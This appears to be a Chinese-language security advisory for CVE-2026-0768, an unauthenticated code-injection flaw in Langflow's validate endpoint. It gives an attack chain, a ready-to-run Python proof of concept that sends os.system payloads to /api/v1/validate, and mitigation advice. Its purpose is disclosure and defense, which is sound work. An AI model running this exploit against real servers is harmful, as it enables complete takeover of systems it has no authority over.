CVE-2026-0768 Langflow代码注入远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-0768

漏洞类型

代码注入/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Langflow

漏洞概述

CVE-2026-0768是Langflow中的一个严重安全漏洞，CVSS评分高达9.8分，属于紧急严重级别。该漏洞为代码注入（Code Injection）导致的远程代码执行（Remote Code Execution）漏洞，允许未经认证的远程攻击者在受影响系统上执行任意代码。Langflow是一个开源的机器学习工作流平台，广泛应用于数据科学和AI领域。漏洞的存在使得攻击者可以直接在服务器上执行恶意代码，以root权限运行，可能导致敏感数据泄露、系统完全沦陷、横向移动等严重后果。由于该漏洞无需认证即可利用，且CVSS评分接近满分，所有暴露在网络中的Langflow实例都面临极高的安全风险。攻击者可以利用此漏洞完全控制目标服务器，窃取数据库中的敏感信息，安装后门程序，甚至将受害系统作为跳板进行更大规模的网络攻击。该漏洞由ZDI（Zero Day Initiative）披露，编号为ZDI-CAN-27322。建议所有使用Langflow的组织立即采取修复措施。

技术细节

该漏洞的根本原因在于Langflow应用程序对用户输入的验证不足。具体来说，漏洞存在于validate端点（/validate或类似端点），该端点直接处理用户提供的code参数。应用程序在接收到code参数后，缺少对输入字符串的充分验证和过滤，直接将用户输入的字符串作为Python代码执行。这种不安全的设计直接导致了代码注入漏洞的产生。攻击者可以通过构造恶意的Python代码片段作为code参数的值，发送给存在漏洞的validate端点。由于应用程序直接执行这些注入的代码，攻击者的代码将在服务器端以Web应用运行的用户权限执行。考虑到该漏洞可能以root权限运行，攻击者实际上可以获得系统的完全控制权。攻击者可以注入任意Python代码，包括但不限于：执行系统命令、读写文件、网络通信、数据库操作等。这种漏洞的利用简单直接，攻击成本低，但危害极大。建议开发者使用AST（抽象语法树）解析、白名单验证或沙箱机制来安全地处理动态代码执行场景。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标环境中运行的Langflow实例，确定其版本和暴露的API端点（特别是validate端点）

STEP 2

步骤2: 构造恶意请求

攻击者构造包含恶意Python代码的HTTP POST请求，将代码注入到code参数中，利用__import__或其他方法导入os模块

STEP 3

步骤3: 发送攻击载荷

攻击者向Langflow的validate端点发送恶意请求，由于该端点无需认证，攻击者可以直接利用漏洞

STEP 4

步骤4: 代码执行

Langflow应用程序接收到请求后，直接执行用户提供的code参数内容，攻击者的恶意代码在服务器端以应用权限运行

STEP 5

步骤5: 权限提升与持久化

如果应用以root权限运行，攻击者直接获得系统最高权限，可进一步安装后门、窃取数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-0768 PoC - Langflow Code Injection RCE
# Note: This PoC is for educational and authorized testing purposes only

import requests
import json
import sys

def exploit(target_url, command):
    """
    Exploit CVE-2026-0768: Langflow Code Injection Remote Code Execution
    
    Args:
        target_url: Base URL of the vulnerable Langflow instance
        command: Command to execute on the target system
    """
    # Construct the validate endpoint URL
    endpoint = f"{target_url.rstrip('/')}/api/v1/validate"
    
    # Construct malicious payload - inject Python code via code parameter
    # Using __import__ to dynamically import os module and execute command
    payload = f"__import__('os').system('{command}')"
    
    # Alternative payload using subprocess
    # payload = f"__import__('subprocess').check_output('{command}', shell=True)"
    
    # Prepare the request data
    data = {
        "code": payload
    }
    
    try:
        # Send the malicious request (no authentication required)
        response = requests.post(endpoint, json=data, timeout=10)
        
        print(f"[*] Request sent to: {endpoint}")
        print(f"[*] Payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <target_url> <command>")
        print(f"Example: {sys.argv[0]} http://localhost:7860 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    cmd = sys.argv[2]
    exploit(target, cmd)

影响范围

Langflow < 最新安全版本

所有未修复的Langflow版本均受影响

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1）如果业务允许，暂时禁用或限制validate端点的访问；2）通过网络访问控制（如防火墙、VPN）限制对Langflow实例的访问，仅允许受信任的IP地址访问；3）实施Web应用防火墙规则，检测和阻止包含可疑代码模式（如__import__、exec、eval等）的请求；4）考虑使用反向代理增加额外的安全层；5）密切监控应用程序日志，关注异常的API请求模式；6）将Langflow部署在隔离的网络区域，限制漏洞利用后的横向移动风险；7）建立应急响应机制，以便在发现入侵时快速响应。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-0768
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-0768
3 Details https://www.cvedetails.com/cve/CVE-2026-0768/
4 VulDB https://vuldb.com/cve/CVE-2026-0768
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-034/